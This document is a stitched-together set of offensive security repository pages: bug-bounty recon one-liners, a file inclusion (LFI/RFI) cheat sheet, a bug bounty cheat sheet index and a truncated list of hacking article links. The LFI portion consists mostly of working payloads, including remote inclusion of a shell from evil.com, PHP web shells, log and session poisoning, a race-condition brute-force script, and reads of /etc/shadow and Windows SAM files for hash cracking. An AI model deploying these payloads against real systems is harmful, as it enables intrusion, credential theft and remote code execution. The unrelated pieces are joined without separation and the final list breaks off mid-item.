jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command] ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command] ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command] ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command] ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command] ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command] ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command] ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command] ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command] ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command] ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command] ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command] ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command] ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command] ```bash cat subdomsains.txt | httpx --silent | jsubfinder search -s ``` ### Search domains to Range-IPS. - [Explained command] ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command] ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command] ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command] ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command] ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command] ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# File Inclusion > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application ## Summary * [Tools](#tools) * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) * [UTF-8 encoding](#utf-8-encoding) * [Path and dot truncation](#path-and-dot-truncation) * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [Wrapper php://filter](#wrapper-phpfilter) * [Wrapper zip://](#wrapper-zip) * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) * [Wrapper input://](#wrapper-input) * [Wrapper phar://](#wrapper-phar) * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) * [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) * [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) ## Basic LFI In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. ```powershell http://example.com/index.php?page=../../../etc/passwd ``` ### Null byte :warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` ### UTF-8 encoding ```powershell http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 ``` ### Path and dot truncation On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd ``` ### Filter bypass tricks ```powershell http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd ``` ## Basic RFI Most of the filter bypasses from LFI section can be reused for RFI. ```powershell http://example.com/index.php?page=http://evil.com/shell.txt ``` ### Null byte ```powershell http://example.com/index.php?page=http://evil.com/shell.txt%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` ### Bypass allow_url_include When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 1. Create a share open to everyone 2. Write a PHP code inside a file : `shell.php` 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` ## LFI / RFI using wrappers ### Wrapper php://filter The part "php://filter" is case insensitive ```powershell http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` can be chained with a compression wrapper for large files. ```powershell http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` ```powershell ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php ``` ### Wrapper zip:// ```python echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` ### Wrapper data:// ```powershell http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" ``` Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` ### Wrapper expect:// ```powershell http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v ``` Alternatively, Kadimus has a module to automate this attack. ```powershell ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input ``` ### Wrapper phar:// Create a phar file with a serialized object in its meta-data. ```php // create new Phar $phar = new Phar('test.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); // add object of any class as meta data class AnyClass {} $object = new AnyClass; $object->data = 'rips'; $phar->setMetadata($object); $phar->stopBuffering(); ``` If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked ```php class AnyClass { function __destruct() { echo $this->data; } } // output: rips include('phar://test.phar'); ``` NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) ## LFI to RCE via /proc/self/environ Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file ```powershell GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: <?=phpinfo(); ?> ``` ## LFI to RCE via upload If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ). ```powershell http://example.com/index.php?page=path/to/uploaded/file.png ``` In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race * increase our guessing odds * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} * Enjoy our shell. ```python import itertools import requests import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the inclusion') for fname in itertools.combinations(string.ascii_letters + string.digits, 6): url = 'http://target.com/index.php?c=/tmp/php' + fname r = requests.get(url) if 'load average' in r.text: # <?php echo system('uptime'); print('[+] We have got a shell: ' + url) sys.exit(0) print('[x] Something went wrong, please try again') ``` ## LFI to RCE via phpinfo() https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) ## LFI to RCE via controlled log file Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` ### RCE via SSH Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`. ```powershell ssh <?php system($_GET["cmd"]);?>@10.10.10.10 ``` Then include the SSH log files inside the Web Application. ```powershell http://example.com/index.php?page=/var/log/auth.log&cmd=id ``` ### RCE via Mail First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. ```powershell root@kali:~# telnet 10.10.10.10. 25 Trying 10.10.10.10.... Connected to 10.10.10.10.. Escape character is '^]'. 220 straylight ESMTP Postfix (Debian/GNU) helo ok 250 straylight mail from: [email protected] 250 2.1.0 Ok rcpt to: root 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> subject: <?php echo system($_GET["cmd"]); ?> data2 . ``` In some cases you can also send the email with the `mail` command line. ```powershell mail -s "<?php system($_GET['cmd']);?>" [email protected]. < /dev/null ``` ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) ```javascript Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly ``` In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files ```javascript /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; ``` Set the cookie to `<?php system('cat /etc/passwd');?>` ```powershell login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php ``` Use the LFI to include the PHP session file ```powershell login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` ## LFI to RCE via credentials files This method require high privileges inside the application in order to read the sensitive files. ### Windows version First extract `sam` and `system` files. ```powershell http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam http://example.com/index.php?page=../../../../../../WINDOWS/repair/system ``` Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. ### Linux version First extract `/etc/shadow` files. ```powershell http://example.com/index.php?page=../../../../../../etc/shadow ``` Then crack the hashes inside in order to login via SSH on the machine. ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [Turning LFI to RFI](https://l.avala.mp/?p=241) * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) * [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
# Bug Bounty Cheat Sheet</h1> | 📚 Reference | 🔎 Vulnerabilities | |-------------------------------------------------------------|-----------------------------------------------------------| | [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md) | [XSS](cheatsheets/xss.md) | | [Books](cheatsheets/books.md) | [SQLi](cheatsheets/sqli.md) | | [Special Tools](cheatsheets/special-tools.md) | [SSRF](cheatsheets/ssrf.md) | | [Recon](cheatsheets/recon.md) | [CRLF Injection](cheatsheets/crlf.md) | | [Practice Platforms](cheatsheets/practice-platforms.md) | [CSV Injection](cheatsheets/csv-injection.md) | | | [LFI](cheatsheets/lfi.md) | | | [XXE](cheatsheets/xxe.md) | | | [RCE](cheatsheets/rce.md) | | | [Open Redirect](cheatsheets/open-redirect.md) | | | [Crypto](cheatsheets/crypto.md) | | | [Template Injection](cheatsheets/template-injection.md) | | | [Content Injection](cheatsheets/content-injection.md) | | | [XSLT Injection](cheatsheets/xslt.md) | # Contributing We welcome contributions from the public. ### Using the issue tracker 💡 The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues) ### Issues and labels 🏷 Our bug tracker utilizes several labels to help organize and identify issues. ### Guidelines for bug reports 🐛 Use the GitHub issue search — check if the issue has already been reported. # Style Guide We like to keep our Markdown files as uniform as possible. So if you submit a PR, make sure to follow this style guide (we will not be angry if you do not). - Cheat sheet titles should start with `##`. - Subheadings should be made bold. (`**Subheading**`) - Add newlines after subheadings and code blocks. - Code blocks should use three backticks. (```) - Make sure to use syntax highlighting whenever possible. # Contributors - [EdOverflow](https://github.com/EdOverflow) - [GerbenJavado](https://github.com/GerbenJavado) - [jon_bottarini](https://github.com/BlueTower) - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae) - [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors)
# PENTESTING-BIBLE # Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY. # Created By Ammar Amer (Twitter @cry__pto) ## Support. *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty: www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/ -4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection: https://medium.com/p/2e143eb36941 -5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality: https://medium.com/p/a11bb5f863b3/share/twitter -6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company: https://medium.com/p/a69afe5a0899 -7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation: https://medium.com/p/b29355a8e68e -9-Recon — my way: https://medium.com/p/82b7e5f62e21 -10-Reconnaissance: a eulogy in three acts: https://medium.com/p/7840824b9ef2 -11-Red-Teaming-Toolkit: https://github.com/infosecn1nja/Red-Teaming-Toolkit -12-Red Team Tips: https://vincentyiu.co.uk/ -13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL: https://modexp.wordpress.com/2019/04/24/glibc-shellcode/ -14-Shellcode: Encrypting traffic: https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/ -15-Penetration Testing of an FTP Server: https://medium.com/p/19afe538be4b -16-Reverse Engineering of the Anubis Malware — Part 1: https://medium.com/p/741e12f5a6bd -17-Privilege Escalation on Linux with Live examples: https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ -18-Pentesting Cheatsheets: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -19-Powershell Payload Delivery via DNS using Invoke-PowerCloud: https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud -20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS: https://sguru.org/ghdb-download-list-4500-google-dorks-free/ -21-SQL Injection Cheat Sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -22-SQLmap’s os-shell + Backdooring website with Weevely: https://medium.com/p/8cb6dcf17fa4 -23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips: https://medium.com/p/c5a3f5764cb3 -24-Top 10 Essential NMAP Scripts for Web App Hacking: https://medium.com/p/c7829ff5ab7 -25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!: https://medium.com/p/52cf5c5640a1 -26-Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -27-XSS Payloads, getting past alert(1): https://medium.com/p/217ab6c6ead7 -28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical: https://medium.com/p/50d8135b7549 -29-Web Application Firewall (WAF) Evasion Techniques: https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques -30-OSINT Resources for 2019: https://medium.com/p/b15d55187c3f -31-The OSINT Toolkit: https://medium.com/p/3b9233d1cdf9 -32-OSINT : Chasing Malware + C&C Servers: https://medium.com/p/3c893dc1e8cb -33-OSINT tool for visualizing relationships between domains, IPs and email addresses: https://medium.com/p/94377aa1f20a -34-From OSINT to Internal – Gaining Access from outside the perimeter: https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter -35-Week in OSINT #2018–35: https://medium.com/p/b2ab1765157b -36-Week in OSINT #2019–14: https://medium.com/p/df83f5b334b4 -37-Instagram OSINT | What A Nice Picture: https://medium.com/p/8f4c7edfbcc6 -38-awesome-osint: https://github.com/jivoi/awesome-osint -39-OSINT_Team_Links: https://github.com/IVMachiavelli/OSINT_Team_Links -40-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -41-Hacking Cryptocurrency Miners with OSINT Techniques: https://medium.com/p/677bbb3e0157 -42-A penetration tester’s guide to sub- domain enumeration: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5 -43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages: https://blackarch.org/recon.html -44-What tools I use for my recon during BugBounty: https://medium.com/p/ec25f7f12e6d -45-Command and Control – DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/ -46-Command and Control – WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/ -47-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -48-Command and Control – Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/ -49-Source code disclosure via exposed .git folder: https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html -50-Pentesting Cheatsheet: https://hausec.com/pentesting-cheatsheet/ -51-Windows Userland Persistence Fundamentals: https://www.fuzzysecurity.com/tutorials/19.html -52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up: https://medium.com/p/abdc7c269dd5 -53-awesome-bug-bounty: https://github.com/djadmin/awesome-bug-bounty -54-dostoevsky-pentest-notes: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -55-awesome-pentest: https://github.com/enaqx/awesome-pentest -56-awesome-windows-exploitation: https://github.com/enddo/awesome-windows-exploitation -57-awesome-exploit-development: https://github.com/FabioBaroni/awesome-exploit-development -58-BurpSuit + SqlMap = One Love: https://medium.com/p/64451eb7b1e8 -59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat: https://medium.com/p/a5a5d3ffea46 -60-DLL Injection: https://pentestlab.blog/2017/04/04/dll-injection -61-DLL Hijacking: https://pentestlab.blog/2017/03/27/dll-hijacking -62-My Recon Process — DNS Enumeration: https://medium.com/p/d0e288f81a8a -63-Google Dorks for nding Emails, Admin users etc: https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc -64-Google Dorks List 2018: https://medium.com/p/fb70d0cbc94 -65-Hack your own NMAP with a BASH one-liner: https://medium.com/p/758352f9aece -66-UNIX / LINUX CHEAT SHEET: cheatsheetworld.com/programming/unix-linux-cheat-sheet/ -67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -68- information gathering: https://pentestlab.blog/category/information-gathering/ -69-post exploitation: https://pentestlab.blog/category/post-exploitation/ -70-privilege escalation: https://pentestlab.blog/category/privilege-escalation/ -71-red team: https://pentestlab.blog/category/red-team/ -72-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -73-Web Application Penetration Testing Cheat Sheet: https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/ -74-Windows Kernel Exploits: https://pentestlab.blog/2017/04/24/windows-kernel-exploits -75-Windows oneliners to download remote payload and execute arbitrary code: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ -76-Windows-Post-Exploitation: https://github.com/emilyanncr/Windows-Post-Exploitation -77-Windows Post Exploitation Shells and File 